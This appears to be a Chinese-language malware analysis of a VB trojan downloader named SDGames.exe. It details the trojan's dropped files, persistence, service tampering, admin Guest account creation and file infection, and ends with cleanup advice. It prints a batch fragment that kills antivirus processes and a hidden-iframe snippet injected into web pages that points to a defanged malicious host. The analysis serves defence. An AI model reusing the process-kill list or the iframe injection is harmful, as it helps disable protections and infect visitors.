文件名称：SDGames.exe

文件大小：59282 byte

A V命名：

Trojan.Win32.VB.yth(瑞星)

Trojan-Downloader.Win32.VB.lg(卡巴斯基)

Win32.Troj.Downloader.vb.237568（金山）

加壳方式：北斗4.1

编写语言：Microsoft Visual Basic 5.0 / 6.0

文件MD5：fc334ffcf5aff3ca8235705d61f62990

行为分析：

1、释放病毒副本：

C:\WINDOWS\system32\AUTORUN.INF 149 字节

C:\WINDOWS\system32\Avpser.cmd 1446 字节

C:\WINDOWS\system32\netshare.cmd 416 字节

C:\WINDOWS\system32\SDGames.exe 59282 字节

C:\WINDOWS\system32\Taskeep.vbs 612 字节

A－Z盘下生成：

AUTORUN.INF 149 字节, RHS
Recycleds.url 98 字节, A（回收站图标）
SDGames.exe 59282 字节, RHS
Windows.url 97 字节, A
新建文件夹.url 97 字节, A（文件夹图标）

在生成AUTORUN.INF前，会先调用RD命令删除免疫的AUTORUN.INF（如果有）

2、添加启动项：

（1）HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
         注册表值 Winstary = "C:\windows\system32\SDGames.exe"

（2）修改system.ini，加入Load和Run值：

         路径为：C:\windows\system32\SDGames.exe

3、开启以下服务：

winmgmt    

lanmanserver

禁用以下服务：

Alg

sharedaccess

4、禁用一些系统功能，比如显示隐藏文件、扩展名、任务管理器、CMD等。

5、修改Reg、Txt文件关联，为：C:\windows\system32\SDGames.exe。

6、IFEO重定向劫持，指向：C:\windows\system32\SDGames.exe。

都是一些比较有名气的安全工具，另外连QQ和影子进程都不放过。

7、Avpser.cmd则尝试关闭一些进程（列一部分）：

%p% RavMonD.exe
%p% RavStub.exe
%p% Anti*
%p% AgentSvr*
%p% CCenter*
%p% Rsaupd*
%p% KvReport*
%p% KvXP*
%p% KVMonXP*
%p% nter*
%p% TrojDie*
%p% avp.com
%p% KRepair.COM
%p% Trojan*
%p% avp.exe
%p% PFW.exe
%p% rising*
%p% ikaka*
%p% .duba*
%p% kingsoft*
%p% 木马*
%p% 社区*
%p% aswBoot*
%p% MainCon*
%p% Regs*
%p% AVP*
%p% Task*
%p% regedit*
%p% Ras*
%p% srgui*
%p% norton*
%p% avp*
%p% fire*
%p% spy*
%p% bullguard*
%p% PersFw*
%p% KAV*
%p% ZONEALARM*
%p% SAFEWEB*
%p% OUTPOST*
%p% ESAFE*
%p% clear*
%p% MonsysNT.exe
%p% awrem32.exe
%p% WINAW32.EXE
%p% PNTIOMON.exe
%p% avgw.exe
%p% avgcc32.exe
%p% PROmon.exe
%p% PNTIOMON.exe
%p% MagicSet.exe
%p% MainCon.exe
%p% TrCleaner.exe
%p% WmNetPro.exe
%p% 修复*
%p% 保护*

8、添加Guest账户，为空密码，权限为Administrator。

9、修改系统时间，为2030年。

10、通过直接获得系统内存隐藏进程，防止被结束。

11、释放Taskeep.vbs，这个应该互斥体，防止进程有多个病毒体在运行。

12、结束explorer.exe进程，并ping127.0.0.1，如果通畅，会下载一个文件,然后重新启动explorer：

hxxp://**.icpcn.com/QQ.gif

其实是个PE文件，具体是什么病毒还没看，不过测试时没有实现。

13、查找：

.jsp
.asp
.php
.htm
.html
.hta

并插入一段代码：

<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0"

src="hxxp://zh**.10mb.cn/" name="Myframe" align="center" border="0">

一个伪装百度的网站，不过下面挂了一个东西：

hxxp://xxx.bao01.com/0.js，失效了～～

14、修改IE主页，为hxxp://**.10mb.cn/。

15、跳过C盘，然后覆盖EXE文件。。（不可能恢复），图标为瓢虫模样。

16、还有一些乱七八糟的，就不写了～

另外这病毒传播方式不是很理想，所以不写解决方法了～

很麻烦滴～

思路是：

1、把SDGame.exe和一些重要的文件覆盖并阻止再生。可以用PowerRmv(可到down.45its.com下载)。

建议暂时删除系统文件taskkill.exe、net.exe、cmd.exe。等弄好后从Dllcache恢复。

不然你会发现计算机响应的速度让你无法忍受。>4核的忽略这步

2、修正系统时间，再下载SREng(可到down.45its.com下载)修改被禁用的XX...

3、那些EXE只能删除了。